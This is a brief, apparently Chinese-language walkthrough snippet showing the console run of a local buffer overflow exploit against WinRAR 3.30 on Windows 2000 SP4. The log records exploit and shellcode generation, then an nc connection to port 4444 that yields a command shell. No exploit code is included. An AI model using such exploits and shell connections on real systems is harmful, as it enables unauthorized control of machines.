溢出成功后,用nc连接目标计算机的4444端口.
I:\Program Files\WinRAR>ihs_winrar 2
-------- WinRAR 330 and below Local BOF exploit by c0d3r
[+] target : windows 2000 advanced server service pack 4
[+] exploit string is 930 byte
[+] shellcode is 399 byte
[+] making exploit string :)
[+] exploit string ready
[+] preparing the executer
[+] executer ready
[+] exploiting ........
I:\Program Files\WinRAR>nc -vv 127.0.0.1 4444
iran [127.0.0.1] 4444 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
I:\Program Files\WinRAR>

